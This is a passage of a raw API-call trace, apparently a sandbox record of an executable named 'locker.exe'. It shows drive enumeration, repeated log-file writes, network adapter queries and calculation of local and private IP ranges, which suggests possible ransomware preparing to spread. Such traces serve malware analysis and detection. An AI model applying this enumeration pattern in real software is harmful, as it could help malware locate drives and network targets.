lpMem=0x437240 | out: hHeap=0x3c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x402228 | out: hHeap=0x3c0000) returned 1 [0197.423] GetTickCount () returned 0x1171f14 [0197.423] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x4) returned 0x419a78 [0197.424] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43d4d8 [0197.424] RtlInitializeConditionVariable (in: ConditionVariable=0x43d4dc | out: ConditionVariable=0x43d4dc) [0197.424] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42b560 [0197.424] RtlInitializeConditionVariable (in: ConditionVariable=0x42b568 | out: ConditionVariable=0x42b568) [0197.424] GetCurrentThreadId () returned 0x116c [0197.424] GetCurrentThreadId () returned 0x116c [0197.424] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x4389d8 [0197.424] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x4389e4 | out: phModule=0x4389e4*=0x320000) returned 1 [0197.424] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x4389d8, dwCreationFlags=0x0, lpThreadId=0xdcfb84 | out: lpThreadId=0xdcfb84*=0x84) returned 0x4b4 [0197.425] SleepConditionVariableSRW (in: ConditionVariable=0x43d4dc, SRWLock=0x42b568, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43d4dc, SRWLock=0x42b568) returned 1 [0197.501] GetCurrentThreadId () returned 0x116c [0197.502] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b560 | out: hHeap=0x3c0000) returned 1 [0197.502] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d4d8 | out: hHeap=0x3c0000) returned 1 [0197.502] CloseHandle (hObject=0x4b4) returned 1 [0197.502] GetLogicalDriveStringsA (in: nBufferLength=0x400, lpBuffer=0xdcf808 | out: lpBuffer="C:\\") returned 0x8 [0197.502] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0197.502] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438898 [0197.502] GetDriveTypeA (lpRootPathName="E:\\") returned 0x3 [0197.502] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b560 [0197.502] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438898 | out: hHeap=0x3c0000) returned 1 [0197.502] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1c) returned 0x43ca80 [0197.502] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43d4d8 [0197.502] RtlInitializeConditionVariable (in: ConditionVariable=0x43d4dc | out: ConditionVariable=0x43d4dc) [0197.502] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42b7c8 [0197.503] RtlInitializeConditionVariable (in: ConditionVariable=0x42b7d0 | out: ConditionVariable=0x42b7d0) [0197.503] GetCurrentThreadId () returned 0x116c [0197.503] GetCurrentThreadId () returned 0x116c [0197.503] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x4389f8 [0197.503] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438a04 | out: phModule=0x438a04*=0x320000) returned 1 [0197.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x4389f8, dwCreationFlags=0x0, lpThreadId=0xdcfb7c | out: lpThreadId=0xdcfb7c*=0xbdc) returned 0x4b4 [0197.504] SleepConditionVariableSRW (in: ConditionVariable=0x43d4dc, SRWLock=0x42b7d0, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43d4dc, SRWLock=0x42b7d0) returned 1 [0197.576] GetCurrentThreadId () returned 0x116c [0197.576] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b7c8 | out: hHeap=0x3c0000) returned 1 [0197.576] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d4d8 | out: hHeap=0x3c0000) returned 1 [0197.576] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419d68 [0197.576] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1c) returned 0x43cbc0 [0197.576] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43d4d8 [0197.576] RtlInitializeConditionVariable (in: ConditionVariable=0x43d4dc | out: ConditionVariable=0x43d4dc) [0197.576] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42b7c8 [0197.576] RtlInitializeConditionVariable (in: ConditionVariable=0x42b7d0 | out: ConditionVariable=0x42b7d0) [0197.576] GetCurrentThreadId () returned 0x116c [0197.576] GetCurrentThreadId () returned 0x116c [0197.576] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x14) returned 0x438af8 [0197.577] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x32591f, phModule=0x438b04 | out: phModule=0x438b04*=0x320000) returned 1 [0197.577] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x358a98, lpParameter=0x438af8, dwCreationFlags=0x0, lpThreadId=0xdcfb7c | out: lpThreadId=0xdcfb7c*=0x428) returned 0x544 [0197.578] SleepConditionVariableSRW (in: ConditionVariable=0x43d4dc, SRWLock=0x42b7d0, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x43d4dc, SRWLock=0x42b7d0) returned 1 [0197.627] GetCurrentThreadId () returned 0x116c [0197.627] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b7c8 | out: hHeap=0x3c0000) returned 1 [0197.627] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d4d8 | out: hHeap=0x3c0000) returned 1 [0197.627] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43dc08 [0197.627] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419d68 | out: hHeap=0x3c0000) returned 1 [0197.627] RtlInitializeConditionVariable (in: ConditionVariable=0xdcfb88 | out: ConditionVariable=0xdcfb88) [0197.627] RtlInitializeConditionVariable (in: ConditionVariable=0xdcfbc4 | out: ConditionVariable=0xdcfbc4) [0197.627] RtlInitializeConditionVariable (in: ConditionVariable=0xdcfc00 | out: ConditionVariable=0xdcfc00) [0197.627] GetLocalTime (in: lpSystemTime=0xdcf9b0 | out: lpSystemTime=0xdcf9b0*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0x1c, wHour=0xd, wMinute=0x36, wSecond=0x18, wMilliseconds=0x158)) [0197.627] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcf854, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.627] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b7c8 [0197.627] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcf840, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.627] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bbb8 [0197.627] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43caa8 [0197.627] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bbb8 | out: hHeap=0x3c0000) returned 1 [0197.627] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43caa8 | out: hHeap=0x3c0000) returned 1 [0197.628] AreFileApisANSI () returned 1 [0197.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42b7c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0197.628] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x46) returned 0x403b10 [0197.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42b7c8, cbMultiByte=-1, lpWideCharStr=0x403b10, cchWideChar=35 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\locker.log") returned 35 [0197.628] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\locker.log" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.log"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xdcf818, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0197.628] GetFileType (hFile=0x4b0) returned 0x1 [0197.628] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403b10 | out: hHeap=0x3c0000) returned 1 [0197.628] GetLastError () returned 0xb7 [0197.629] SetLastError (dwErrCode=0xb7) [0197.629] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0197.629] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcf310 | out: lpNewFilePointer=0x0) returned 1 [0197.629] GetLastError () returned 0xb7 [0197.629] SetLastError (dwErrCode=0xb7) [0197.629] GetLastError () returned 0xb7 [0197.629] SetLastError (dwErrCode=0xb7) [0197.629] SetFilePointerEx (in: hFile=0x4b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcf808 | out: lpNewFilePointer=0x0) returned 1 [0197.629] WriteFile (in: hFile=0x4b0, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0xdcf86c, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0xdcf86c*=0x38, lpOverlapped=0x0) returned 1 [0197.630] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0197.630] CloseHandle (hObject=0x4b0) returned 1 [0197.632] GetLastError () returned 0xb7 [0197.632] SetLastError (dwErrCode=0xb7) [0197.632] GetLastError () returned 0xb7 [0197.632] SetLastError (dwErrCode=0xb7) [0197.632] GetLastError () returned 0xb7 [0197.633] SetLastError (dwErrCode=0xb7) [0197.633] GetLastError () returned 0xb7 [0197.633] SetLastError (dwErrCode=0xb7) [0197.633] GetLastError () returned 0xb7 [0197.633] SetLastError (dwErrCode=0xb7) [0197.633] GetLastError () returned 0xb7 [0197.633] SetLastError (dwErrCode=0xb7) [0197.633] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b7c8 | out: hHeap=0x3c0000) returned 1 [0197.633] GetAdaptersInfo (in: AdapterInfo=0x3fd070, SizePointer=0xdcfb48 | out: AdapterInfo=0x3fd070, SizePointer=0xdcfb48) returned 0x0 [0197.655] GetAdaptersInfo (in: AdapterInfo=0x3fd070, SizePointer=0xdcfb48 | out: AdapterInfo=0x3fd070, SizePointer=0xdcfb48) returned 0x0 [0197.719] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bc60 [0197.719] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec888 [0197.719] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bc60 | out: hHeap=0x3c0000) returned 1 [0197.720] GetLocalTime (in: lpSystemTime=0xdcf998 | out: lpSystemTime=0xdcf998*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0x1c, wHour=0xd, wMinute=0x36, wSecond=0x18, wMilliseconds=0x1b6)) [0197.720] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcf83c, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.720] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bf70 [0197.720] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcf828, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.720] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b918 [0197.720] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0197.720] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b918 | out: hHeap=0x3c0000) returned 1 [0197.720] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cd00 | out: hHeap=0x3c0000) returned 1 [0197.720] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x38) returned 0x4328f8 [0197.720] AreFileApisANSI () returned 1 [0197.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bf70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0197.720] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x46) returned 0x4038e0 [0197.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bf70, cbMultiByte=-1, lpWideCharStr=0x4038e0, cchWideChar=35 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\locker.log") returned 35 [0197.720] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\locker.log" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.log"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xdcf800, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0197.721] GetFileType (hFile=0x5cc) returned 0x1 [0197.721] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4038e0 | out: hHeap=0x3c0000) returned 1 [0197.721] GetLastError () returned 0xb7 [0197.721] SetLastError (dwErrCode=0xb7) [0197.721] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0197.721] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcf2f8 | out: lpNewFilePointer=0x0) returned 1 [0197.721] GetLastError () returned 0xb7 [0197.721] SetLastError (dwErrCode=0xb7) [0197.721] GetLastError () returned 0xb7 [0197.721] SetLastError (dwErrCode=0xb7) [0197.721] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcf7f0 | out: lpNewFilePointer=0x0) returned 1 [0197.722] WriteFile (in: hFile=0x5cc, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x6c, lpNumberOfBytesWritten=0xdcf854, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0xdcf854*=0x6c, lpOverlapped=0x0) returned 1 [0197.722] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0197.722] CloseHandle (hObject=0x5cc) returned 1 [0197.724] GetLastError () returned 0xb7 [0197.724] SetLastError (dwErrCode=0xb7) [0197.724] GetLastError () returned 0xb7 [0197.724] SetLastError (dwErrCode=0xb7) [0197.724] GetLastError () returned 0xb7 [0197.724] SetLastError (dwErrCode=0xb7) [0197.724] GetLastError () returned 0xb7 [0197.724] SetLastError (dwErrCode=0xb7) [0197.724] GetLastError () returned 0xb7 [0197.724] SetLastError (dwErrCode=0xb7) [0197.724] GetLastError () returned 0xb7 [0197.724] SetLastError (dwErrCode=0xb7) [0197.725] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bf70 | out: hHeap=0x3c0000) returned 1 [0197.725] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec888 | out: hHeap=0x3c0000) returned 1 [0197.725] RtlInitializeConditionVariable (in: ConditionVariable=0xdcf9f4 | out: ConditionVariable=0xdcf9f4) [0197.725] RtlInitializeConditionVariable (in: ConditionVariable=0xdcfa30 | out: ConditionVariable=0xdcfa30) [0197.725] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438b58 [0197.725] inet_addr (cp="192.168.0.59") returned 0x3b00a8c0 [0197.725] inet_addr (cp="255.255.255.0") returned 0xffffff [0197.725] inet_ntoa (in=0xa8c0) returned="192.168.0.0" [0197.725] inet_ntoa (in=0xff00a8c0) returned="192.168.0.255" [0197.725] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x437288 [0197.725] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5f) returned 0x3ec7b8 [0197.725] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x437288 | out: hHeap=0x3c0000) returned 1 [0197.725] GetLocalTime (in: lpSystemTime=0xdcf9a4 | out: lpSystemTime=0xdcf9a4*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0x1c, wHour=0xd, wMinute=0x36, wSecond=0x18, wMilliseconds=0x1b6)) [0197.725] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcf848, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.725] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be58 [0197.725] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcf834, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.725] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b8e0 [0197.725] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb70 [0197.725] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b8e0 | out: hHeap=0x3c0000) returned 1 [0197.725] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb70 | out: hHeap=0x3c0000) returned 1 [0197.726] AreFileApisANSI () returned 1 [0197.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42be58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0197.726] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x46) returned 0x403c50 [0197.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42be58, cbMultiByte=-1, lpWideCharStr=0x403c50, cchWideChar=35 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\locker.log") returned 35 [0197.726] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\locker.log" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.log"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xdcf80c, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0197.726] GetFileType (hFile=0x5cc) returned 0x1 [0197.726] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403c50 | out: hHeap=0x3c0000) returned 1 [0197.726] GetLastError () returned 0xb7 [0197.726] SetLastError (dwErrCode=0xb7) [0197.726] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0197.726] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcf304 | out: lpNewFilePointer=0x0) returned 1 [0197.727] GetLastError () returned 0xb7 [0197.727] SetLastError (dwErrCode=0xb7) [0197.727] GetLastError () returned 0xb7 [0197.727] SetLastError (dwErrCode=0xb7) [0197.727] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcf7fc | out: lpNewFilePointer=0x0) returned 1 [0197.727] WriteFile (in: hFile=0x5cc, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x6f, lpNumberOfBytesWritten=0xdcf860, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0xdcf860*=0x6f, lpOverlapped=0x0) returned 1 [0197.727] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0197.727] CloseHandle (hObject=0x5cc) returned 1 [0197.730] GetLastError () returned 0xb7 [0197.730] SetLastError (dwErrCode=0xb7) [0197.730] GetLastError () returned 0xb7 [0197.730] SetLastError (dwErrCode=0xb7) [0197.730] GetLastError () returned 0xb7 [0197.730] SetLastError (dwErrCode=0xb7) [0197.730] GetLastError () returned 0xb7 [0197.730] SetLastError (dwErrCode=0xb7) [0197.730] GetLastError () returned 0xb7 [0197.730] SetLastError (dwErrCode=0xb7) [0197.730] GetLastError () returned 0xb7 [0197.730] SetLastError (dwErrCode=0xb7) [0197.730] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be58 | out: hHeap=0x3c0000) returned 1 [0197.730] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec7b8 | out: hHeap=0x3c0000) returned 1 [0197.730] GetCurrentThreadId () returned 0x116c [0197.730] GetCurrentThreadId () returned 0x116c [0197.730] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa8) returned 0x3ef1f0 [0197.731] RtlInitializeConditionVariable (in: ConditionVariable=0x3ef204 | out: ConditionVariable=0x3ef204) [0197.731] RtlInitializeConditionVariable (in: ConditionVariable=0x3ef240 | out: ConditionVariable=0x3ef240) [0197.731] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x4388f8 [0197.731] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x438b58 | out: hHeap=0x3c0000) returned 1 [0197.731] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bad8 [0197.731] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x47) returned 0x403b60 [0197.731] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bad8 | out: hHeap=0x3c0000) returned 1 [0197.731] GetLocalTime (in: lpSystemTime=0xdcf8cc | out: lpSystemTime=0xdcf8cc*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0x1c, wHour=0xd, wMinute=0x36, wSecond=0x18, wMilliseconds=0x1c7)) [0197.731] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcf770, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.731] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42be90 [0197.731] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcf75c, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0197.731] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb80 [0197.731] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0197.731] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb80 | out: hHeap=0x3c0000) returned 1 [0197.731] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cd00 | out: hHeap=0x3c0000) returned 1 [0197.731] AreFileApisANSI () returned 1 [0197.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42be90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0197.731] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x46) returned 0x403a70 [0197.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42be90, cbMultiByte=-1, lpWideCharStr=0x403a70, cchWideChar=35 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\locker.log") returned 35 [0197.732] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\locker.log" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.log"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xdcf734, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0197.732] GetFileType (hFile=0x5cc) returned 0x1 [0197.732] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403a70 | out: hHeap=0x3c0000) returned 1 [0197.732] GetLastError () returned 0xb7 [0197.732] SetLastError (dwErrCode=0xb7) [0197.732] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3f6f08 [0197.732] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcf22c | out: lpNewFilePointer=0x0) returned 1 [0197.732] GetLastError () returned 0xb7 [0197.732] SetLastError (dwErrCode=0xb7) [0197.732] GetLastError () returned 0xb7 [0197.732] SetLastError (dwErrCode=0xb7) [0197.733] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xdcf724 | out: lpNewFilePointer=0x0) returned 1 [0197.733] WriteFile (in: hFile=0x5cc, lpBuffer=0x3f6f08*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0xdcf788, lpOverlapped=0x0 | out: lpBuffer=0x3f6f08*, lpNumberOfBytesWritten=0xdcf788*=0x51, lpOverlapped=0x0) returned 1 [0197.733] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f6f08 | out: hHeap=0x3c0000) returned 1 [0197.733] CloseHandle (hObject=0x5cc) returned 1 [0197.734] GetLastError () returned 0xb7 [0197.734] SetLastError (dwErrCode=0xb7) [0197.734] GetLastError () returned 0xb7 [0197.734] SetLastError (dwErrCode=0xb7) [0197.735] GetLastError () returned 0xb7 [0197.735] SetLastError (dwErrCode=0xb7) [0197.735] GetLastError () returned 0xb7 [0197.735] SetLastError (dwErrCode=0xb7) [0197.735] GetLastError () returned 0xb7 [0197.735] SetLastError (dwErrCode=0xb7) [0197.735] GetLastError () returned 0xb7 [0197.735] SetLastError (dwErrCode=0xb7) [0197.735] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42be90 | out: hHeap=0x3c0000) returned 1 [0197.735] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403b60 | out: hHeap=0x3c0000) returned 1 [0197.735] inet_addr (cp="192.168.0.0") returned 0xa8c0 [0197.735] inet_addr (cp="192.168.0.255") returned 0xff00a8c0 [0197.735] inet_addr (cp="192.168.0.0") returned 0xa8c0 [0197.735] inet_addr (cp="10.0.0.0") returned 0xa [0197.735] inet_addr (cp="10.255.255.255") returned 0xffffff0a [0197.735] inet_addr (cp="100.64.0.0") returned 0x4064 [0197.735] inet_addr (cp="100.127.255.255") returned 0xffff7f64 [0197.735] inet_addr (cp="172.16.0.0") returned 0x10ac [0197.735] inet_addr (cp="172.31.255.255") returned 0xffff1fac [0197.735] inet_addr (cp="192.168.0.0") returned 0xa8c0 [0197.735] inet_addr (cp="192.168.255.255") returned 0xffffa8c0 [0197.735] inet_addr (cp="192.168.0.255") returned 0xff00a8c0 [0197.735] inet_addr (cp="10.0.0.0") returned 0xa [0197.735] inet_addr (cp="10.255.255.255") returned 0xffffff0a [0197.735] inet_addr (cp="100.64.0.0") returned 0x4064 [0197.736] inet_addr (cp="100.127.255.255") returned 0xffff7f64 [0197.736] inet_addr (cp="172.16.0.0") returned 0x10ac [0197.736] inet_addr (cp="172.31.255.255") returned 0xffff1fac [0197.736] inet_addr (cp="192.168.0.0") returned 0xa8c0 [0197.736] inet_addr (cp="192.168.255.255") returned 0xffffa8c0 [0197.736] inet_ntoa (in=0xa8c0) returned="192.168.0.0" [0197.736] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x438838 [0197.736] GetCurrentThreadId () returned 0x116c [0197.736] GetCurrentThreadId () returned 0x116c [0197.736] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x24) returned 0x43d388 [0197.736] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x28) returned 0x43cea8 [0197.736] RtlInitializeConditionVariable (in: ConditionVariable=0x43ceac | out: ConditionVariable=0x43ceac) [0197.736] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x30) returned 0x42be58 [0197.736] 